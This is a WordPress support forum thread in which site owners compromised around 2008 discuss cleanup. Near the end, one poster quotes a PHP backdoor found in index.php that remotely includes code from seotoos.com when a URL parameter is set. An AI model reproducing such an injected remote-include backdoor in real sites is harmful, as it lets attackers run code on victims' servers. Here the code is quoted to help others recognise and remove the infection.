Can’t save, edit or publish

Sidewalklyrics, if the problem is in fact related to changes made to files on your server, as it was for me and saraking, then it’s not a WordPress problem and they can’t really do anything about it.

I’m not saying no one will respond–I really have no idea if they will or not. But I wouldn’t count on it, especially since a potential solution has been posted.

If there is a reason my fix won’t work for you, you should post the reason specifically so that other people consider the problem “open” and keep looking for other solutions. For anyone looking at all the issues on here, I would expect they’re more likely to spend time on problems that no one has offered any answers to. If your problem is actually different from mine, or if my solution won’t work, that could leave you out in the cold, so make sure you explain your situation.

(This is why, in my first post, I was reluctant to include too many details about my problem, since I didn’t want to “unfocus” the original poster’s problem. But after it went on for a while I decided to go for it.)

Having said all that, I agree it would be great if someone (a WordPress person or anyone smart!) could come up with a theory as to what kind of changes to which files *could* solve this problem without a complete restore. Just to satisfy my curiosity and so I could learn something new that might help in different situations.

My hosting provider is Yahoo and they only have a Snapshot Backup option, where files have to be restored from an earlier snapshot one by one. There’s no option to restore entire folders. Does anyone have any idea which specific files are problematic and should be restored? Given the large number of blog-related files, it would be incredibly tedious to restore them one by one.

But there is need to find what was changed to prevent future attacks. Restoring old files means restoring wordpress with same vulnerability.

Lachmi, it seems to me that the snapshot backup is better for you in this instance. It means Yahoo is only taking backups of files as they change rather than backing up your whole system every day.

This means they should be able to tell you exactly which files changed most recently and only restore those. And if restoring those solves the problem, that will also tell the rest of us which files caused the issue.

The problem is that ALL the blog files are showing the modified date as today (perhaps because I accessed the blog and the admin features?), so that means that all of them have to be restored.

Indeed. If there is a serious vulnerability, it is the responsibility of WP to identify it as quickly as possible and post a workaround or fix. Since they are so proud of still supporting the early versions of their software, they need to live up to that challenge.

I also had the seotoo injection into my index.php file, but that is the only one I can find with any changes. However, there are several files that look suspect to me. Can anyone clarify if these are supposed to exist or not?

wp-content/index.php.gif
wp-conent/themes/classic_old.php.pngg
wp-admin/import/b2_old.php.pngg

Pilt

I see.

You might still be able to make it work, because Yahoo takes snapshots every four hours and keeps them for four weeks. So you could restore the second-newest snapshot, or third-newest, and see which were changed there.

https://help.yahoo.com/l/us/yahoo/smallbusiness/webhosting/backup/backup-06.html

Piltdownman, I have another WordPress install that has not been compromised and it does not have those files. I’m running 2.2.1. (In my admittedly non-expert opinion, they don’t look dangerous to me. The .gif shouldn’t be dangerous, and although I haven’t seen .pngg files before I’m guessing they’re just renamed .png (image) files.)

I would love to see an answer from WordPress here too.

But if we are all having this problem because someone logged on to our servers and changed the perfectly good software we got from WordPress, then it’s not a WordPress vulnerability. There are problably dozens of ways someone could create a problem if they have access to your WordPress files.

Of course your issue may be different from mine and may actually be a WordPress bug. But if your symptoms are the same as others’ on this thread–Saves were working fine for a while and then suddenly not working–it’s hard to see how it could be a bug. That’s why they often recommend an upgrade for this kind of problem–it gets rid of anything not in their default install, and eliminates the possiblity of something you, or I, or a hacker, changed in their working code.

In my case a restore of the backup accompished a similar thing–got rid of possible unauthorized changes but without me having to go through the pain of an upgrade.

And if there’s a vulnerability issue then it’s with the server host, not WordPress.

Quick question: what is the name of the actual database of blog posts and comments and in which folder would it typically be located?

Lachmi –

All that info is in the database, not in any of the folders/directories in your public_html space. The database would have been named by you or whoever set up the site in the first place.

I access mine my using phpMyAdmin, which is available as a WP plugin.

Locked –

As to the semantics of whether it’s a bug or a security hole or vulnerability, I don’t care. I just know that when hackers find a way in, whether they are doing it manually or via a bot, then the people who designed the software should respond; quickly.

Pilt

I totally understand the “I don’t care what you call it, I just need it fixed” idea. I would just add one thing to what you said:

I just know that when hackers find a way in, whether they are doing it manually or via a bot, then the people who designed the software should respond; quickly, if the bug or security hole or vulnerability is their fault.

This is where the semantics actually make a difference, because in this case, it is certainly not a bug, because those of us with the problem had working systems for months. It appears to be that something was changed by someone.

Now the hole or vulnerability that allowed this change could be WordPress’s fault, or it could be a hole in the access to your/my server, which would not be their fault, nor could they do anything about it. And since it’s a new problem with an old version of the software, it’s just as likely to be an issue with the server access than WordPress. (Otherwise WordPress users would have been having this problem for years. It’s also possible that there has recently been a linux or apache patch that has allowed some unauthorized access via the server, instead of via WordPress.)

And, in general, if you expect someone who gave you free software to fix something for you for free, in the timeframe that you find acceptable, you might be doomed to disappointment. Especially when they have already acknowledged that they can’t promise that, which is why this forum is here. They neither imply nor promise that they will solve every problem, or solve ANY problem within a particular amount of time.

You need to pay for that kind of service.

That doesn’t stop me from agreeing with you that I wish someone would come on here with a better idea than restoring all your files…

OK. I give up ??

I was able to get my site back up and running. One thing that helped was the advice I found here:

https://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack

This was from a year ago, but it appears that a similar attack disabled my site and caused me problems in posting. I could be the same for others….

I did not find all of the same problems noted in the above post (in particular, the RSS code in the database did not match up, so I left it alone) but a lot of it was similar.

I do think that several of those “supposed” pngs and jpegs were suspect, so I commented them out. I also found a couple of files in my uploads folder (the names started with “up…..” that would not open in Photoshop — so I figured they were not real jpegs…and I deleted them.

People will have to get into their databases to fix things up, so if you are unsure how to use phpMyAdmin, you should read up. It is a plugin you can download, but I know it can be daunting for less-experienced users…

Hope this helps someone!

Pilt

I don’t know if this is allowed on here but I’m a freelancer that works primarily with wordpress. If you don’t feel like dealing with the hassle of upgrading, email me and I’ll upgrade you for a reasonable rate.

info at klcreativedesign.com

Thanks!

Kristy Lee

I painstakingly restored most of the files to an earlier snapshot captured in Yahoo (web hosting), but it still doesn’t work. Does anyone have other suggestions apart from this?

Can anyone from WordPress please step in?

I was recently contacted through elance to solve this problem by (SJDankoSF); have not contacted him yet but I will. I went trough your posts and now I am definitely sure all of you got hacked.
@landykos who posted this code `<?php if(md5($_COOKIE[‘12942fc392b445f9’])==”695d55c75600f74e94cdded60b2711d0″){ exit; } ?><?php
/* Short and sweet */
if (isset($_GET[‘license’])) {
@include(‘https://seotoos.com/license.txt&#8217;);
} else {
define(‘WP_USE_THEMES’, true);
if (isset($_GET[‘license’])) {
@include(‘https://seotoos.com/license.txt&#8217;);
} else {
require(‘./wp-blog-header.php’);
}
}
?>
` This is a Trojan horse insertion, and probably all of you will find some type of similar code inserted in your files. usually all index.php, config.php and other files.

@lockedroomguy you found the same code on your index page and after deleting it didn’t solve it because this type of code it is usually inserted in more than 5 files.

If it doesn’t work after backup restoration, that is because your database it is infected as well. Remember that wp-config.php file contains the DB login/pass. That means the hacker has it as well. Case @lachmi

For the ones that got fixed, restoring will not be the solution if you are using an outdated version and have not changed all of your logins. (hosting/fps/DBs). They will insert the Trojan again.

Yahoo does not upgrade older WP versions to the newest one automatically. That has to be done manually.

Take care.